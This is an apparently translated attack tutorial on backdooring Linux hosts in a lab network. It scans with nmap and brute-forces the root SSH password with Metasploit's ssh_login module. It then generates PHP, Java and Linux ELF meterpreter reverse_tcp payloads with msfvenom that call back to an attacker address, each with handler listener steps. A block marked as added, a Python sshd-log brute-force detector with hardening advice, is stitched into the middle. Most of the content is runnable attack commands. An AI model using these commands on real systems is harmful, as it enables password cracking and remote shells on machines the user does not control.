Backdooring Linux systems with Metasploit and cross-platform backdoor generation
1. Brute-forcing the target host's SSH with Metasploit
1.1 Brute-force process
2. PHP backdoor generation
3. Java backdoor generation
4. Linux backdoor generation
Reference documentation
1. Brute-forcing the target host's SSH with Metasploit
1. Principle: the target machine's root user has a weak password, so the target host's SSH service can be cracked by enumeration
1.1 Brute-force process
1. Find the live hosts on the internal LAN: nmap -sP 192.168.73.0/24
; this gives the target's IP
2. Scan the target's operating system: nmap -O 192.168.73.128
; this gives the target's operating system and version number
3. Scan the target's open ports and the version numbers of its applications: nmap -sV -Pn 192.168.73.128
; port 22 is found open, and the application on it is ssh
4. Open Metasploit and use the msf ssh_login module to brute-force the target's SSH password: use auxiliary/scanner/ssh/ssh_login
; after entering the module, run show options to see its configuration
5. Set up the user name dictionary and the password dictionary (to reduce the brute-force time, the user names and passwords are limited to a specific few)
- Put the user.txt and pass.txt files into the specified directory on Kali Linux
6. Prepare the SSH brute force: set the paths to the user name dictionary and the password dictionary; set the target's IP address; set the threads to 50; start execution
- If nothing is shown after exploit, set VERBOSE to true
7. Wait for the SSH brute force to finish
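On the target, the brute force in steps 4 to 7 shows up as a burst of failed-password lines in the sshd log. The following added example (not part of the original post) flags any source that reaches a failure threshold inside a time window and records when a successful login follows the burst; the log lines, threshold, window and year are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (not from the original post); addresses reuse its lab subnet.
SAMPLE_LOG = """\
Aug 28 14:20:01 target sshd[1201]: Failed password for root from 192.168.73.131 port 40112 ssh2
Aug 28 14:20:01 target sshd[1202]: Failed password for root from 192.168.73.131 port 40114 ssh2
Aug 28 14:20:02 target sshd[1203]: Failed password for invalid user admin from 192.168.73.131 port 40116 ssh2
Aug 28 14:20:02 target sshd[1204]: Failed password for root from 192.168.73.131 port 40118 ssh2
Aug 28 14:20:03 target sshd[1205]: Failed password for root from 192.168.73.131 port 40120 ssh2
Aug 28 14:20:03 target sshd[1190]: Failed password for alice from 192.168.73.1 port 51514 ssh2
Aug 28 14:20:04 target sshd[1206]: Failed password for root from 192.168.73.131 port 40122 ssh2
Aug 28 14:20:05 target sshd[1207]: Accepted password for root from 192.168.73.131 port 40124 ssh2
Aug 28 14:20:09 target sshd[1190]: Accepted password for alice from 192.168.73.1 port 51514 ssh2
"""

EVENT = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2019):
    """Map each source IP that reaches `threshold` failures within `window` to its finding."""
    failures = defaultdict(deque)  # source IP -> failure timestamps still inside the window
    findings = {}
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        stamp, outcome, user, src = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")  # syslog omits the year
        q = failures[src]
        while q and ts - q[0] > window:  # drop failures that have aged out of the window
            q.popleft()
        if outcome == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                hit = findings.setdefault(src, {"peak": 0, "accepted_as": []})
                hit["peak"] = max(hit["peak"], len(q))
        elif len(q) >= threshold:
            # A login accepted while the burst is still in the window: a guess succeeded.
            findings[src]["accepted_as"].append(user)
    return findings

if __name__ == "__main__":
    for src, hit in detect_bruteforce(SAMPLE_LOG).items():
        print(src, "peak failures:", hit["peak"], "then logged in as:", hit["accepted_as"])
```

A non-empty accepted_as list means a guessed password worked and the account should be treated as compromised. Setting PermitRootLogin prohibit-password in sshd_config removes the weak root password login this section relies on.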
2. PHP backdoor generation
1. Example command:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php
2. Configure Metasploit and run exploit to listen
search exploit/handler // (exploit/multi/handler: generic payload handler)
use exploit/multi/handler // use the module
show options // configuration
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp // set the payload under test
exploit // listen
- Using the PHP backdoor
3. Java backdoor generation
1. Example command:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar
2. Configure Metasploit and run exploit to listen
search exploit/handler // (exploit/multi/handler: generic payload handler)
use exploit/multi/handler // use the module
show options // configuration
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp // set the payload under test
exploit // listen
- Using the Java backdoor
4. Linux backdoor generation
1. Example command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > /root/Desktop/shell
2. Configure Metasploit and run exploit to listen
search exploit/handler // (exploit/multi/handler: generic payload handler)
use exploit/multi/handler // use the module
show options // configuration
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp // set the payload under test
exploit // listen
- Using the Linux backdoor
Reference documentation
- https://blog.csdn.net/Tahir_111/article/details/82389570
- https://bbs.ichunqiu.com/thread-20137-1-1.html
2019-08-28 14:27:50 Wednesday